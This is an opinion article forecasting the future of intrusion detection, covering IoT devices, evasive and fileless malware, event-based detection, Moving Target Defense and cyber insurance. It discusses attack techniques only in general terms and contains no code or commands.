The future of intrusion detection

detection paradigmIt’s always an interesting exercise to extrapolate from current technologies and industry challenges to sketch the future landscape. This especially holds true for cyber security, with its rapid growth and change as new threat types, targets and counter techniques emerge almost daily. While hard and fast predictions fall beyond my purview, I see several trends likely to dominate the field in the upcoming years, particularly around intrusion detection.

As a refresher, intrusion detection systems (IDS) identify when someone or something attempts to compromise a system or resource. Detection mechanisms include signature-based methods – comparing a pattern or signature to previous events – and behavior analysis, which detects anomalous actions.

Over the next several years, intrusion detection will evolve in two directions:

IoT: An expanding attack surface

Intrusion detection systems, algorithms and data analysis must take the emerging IoT into the equation. Attackers can breach organizations from multiple points via cameras, automotive or wearable devices. In order to deduce the intruder path, multiple sources of data from all IoT devices in the organization will have to be distilled into a centralized place.

No more hide and seek: It’s time for event detection

Cyber criminals are developing new and innovative attacks that employ evasive and polymorphic techniques to escape detection. These techniques render the old hermetic intrusion detection paradigm useless. Famous for this is anti-forensic malware. At the initial step of the execution of such malware, it determines whether or not there is an AV or IDS “in the area.” If so, it takes one or more evasive actions: (1) employs special techniques to evade the specific detection algorithm; (2) remains dormant, hiding its malicious intent until it is in a “safe” environment; (3) attacks the defense system itself. Close to 80% of current malware uses anti-forensic techniques at some level.

But this is only one type of evasive attack. Some attacks are non-persistent, residing only in memory and leaving no footprint on the hard-drive. For example, the PowerWare ransomware program that recently targeted the Healthcare industry blends in with legitimate computer activity by using Windows PowerShell to download a malicious script. Many AVs and IDSs are “file scanning oriented,” hence can be bypassed by such attacks.

Moreover, as found by Google researchers, security suites themselves contain vulnerabilities, which allow malware not only to bypass or evade the security systems, but to use them for their own purposes.

In the future, instead of detecting an intruder, detection systems will identify a suspicious event and let the system administrator or security officer decide whether to start an investigation. We will probably see more and more forensic teams involved in cyber incidents performing in-depth analysis of events suspected to be an intrusion. In addition, AI algorithms will evolve to help security products continuously learn attacks and their behaviors, make connections between suspicious events, and predict future evolutions of an attack.

Detection will take a backseat to prevention

As it becomes increasingly difficult and costly to detect intrusions and quickly neutralize them, systems that do not rely on first detecting an attack to limit damage to a company will be added to the security stack. One method is to reduce or obfuscate the attack surface itself so that target vulnerabilities cannot be found. We’ll see increasing use by cyber security providers of hacker-type deception techniques. Such prevention methods can be loosely grouped in a category known as Moving Target Defense (MTD). In contrast to NIDS and HIDS, MTD continuously and persistently changes the attack surface, preventing the enemy from entering in the first place.

Other trends

Cyber insurance is something that will probably receive increased attention. More organizations will suffer from data loss, data leakage, sabotage and espionage as a result of breaches. The damage from such events could be much higher than that of a traditional fire or theft event.

The human factor will grow in all aspects of cyber security. More and more human analysis, incident-response teams and forensic crews will be involved in almost every company to complement the traditional intrusion-detection and intrusion-prevention systems. The automotive industry will need to incorporate defensive intrusion prevention and detection solutions into their cars, as the impact of attacks could be disastrous.

The upshot?

The cyber security arena will expand in all aspects: More data, more devices around us, more attack vectors and more cyber physical threats.

Don't miss